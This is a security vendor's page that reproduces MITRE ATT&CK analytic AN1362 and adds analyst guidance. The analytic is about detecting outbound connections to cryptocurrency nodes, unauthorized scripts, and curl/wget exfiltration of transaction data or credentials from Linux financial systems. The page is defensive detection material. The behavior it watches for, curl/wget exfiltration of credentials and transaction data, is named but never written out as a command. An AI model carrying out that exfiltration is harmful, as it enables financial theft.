Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1362: Analytic 1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

EnterpriseAN1362AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1362 is a Linux-focused detection analytic for spotting suspicious outbound connections and automation that may indicate financial transaction data, credentials, or payment-related files are being targeted. Its value is not just technical: if an organization runs financial applications or payment workflows on Linux systems, this analytic points leaders toward validating whether SOC monitoring can see unusual external connectivity, script activity, and data movement from those systems.

Executive priority

Prioritize this where Linux servers support finance, treasury, billing, payment processing, or other high-value transaction workflows. The business question is whether the organization can produce timely evidence of suspicious outbound activity from those systems and distinguish approved automation from unauthorized scripts. This supports incident decision-making, audit readiness, and resilience of financial operations, but local asset criticality and log coverage are required to determine actual priority.

Technical view

SOC and detection teams should validate monitoring of server and endpoint logs on Linux systems for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, automation targeting payment file formats, and curl/wget activity associated with exfiltration of transaction data or credentials from financial applications. Because no ATT&CK tactic, relationship context, or formal detection logic is supplied, teams should translate the description into environment-specific analytics using known financial application hosts, approved scripts, expected destinations, and normal transfer patterns.

Likely telemetry

  • Linux server and endpoint logs
  • Outbound network connection logs from Linux hosts
  • Process execution telemetry for curl and wget
  • Script execution or automation logs
  • Financial application access logs

Detection direction

  • Baseline expected outbound destinations and protocols for Linux systems that host or access financial applications.
  • Alert on unusual outbound connections from financial systems, especially to destinations inconsistent with business workflows, including cryptocurrency-node-related infrastructure where identifiable.
  • Monitor curl and wget execution from financial application servers, tuning for legitimate administrative or integration activity.
  • Correlate script execution with access to transaction data, payment file formats, or financial application credentials.
  • Reduce false positives by documenting approved payment automation, scheduled jobs, service accounts, and sanctioned file-transfer processes.

Mitigation priorities

  • Inventory Linux systems that support financial applications and payment file workflows.
  • Restrict and review outbound network access from financial application servers based on business need.
  • Define approved automation, scripts, service accounts, and file-transfer paths for financial operations.
  • Ensure logging is enabled for process execution, outbound connections, financial application access, and payment file handling.
  • Use change control and periodic review to detect unauthorized scripts or unexpected automation affecting financial systems.
Analyst notes and limits

The supplied object is a detection analytic, not a full ATT&CK technique. It is specific to Linux and focuses on monitoring server and endpoint logs for suspicious outbound connections, script activity, payment-file automation, and curl/wget use around financial applications. No relationship context is supplied, so mapping to specific tactics, techniques, or procedures should be performed locally.

Official detection logic is not provided, tactics are not specified, and no relationships are supplied. This take cannot assert active exploitation, attribution, impact, or existing detection coverage. Effectiveness depends on the organization’s Linux telemetry, financial application architecture, egress visibility, and knowledge of approved automation.

Official MITRE ATT&CK definition

Analytic 1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
01a01cdb5b4553ca...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 01a01cdb5b45…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN1362
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use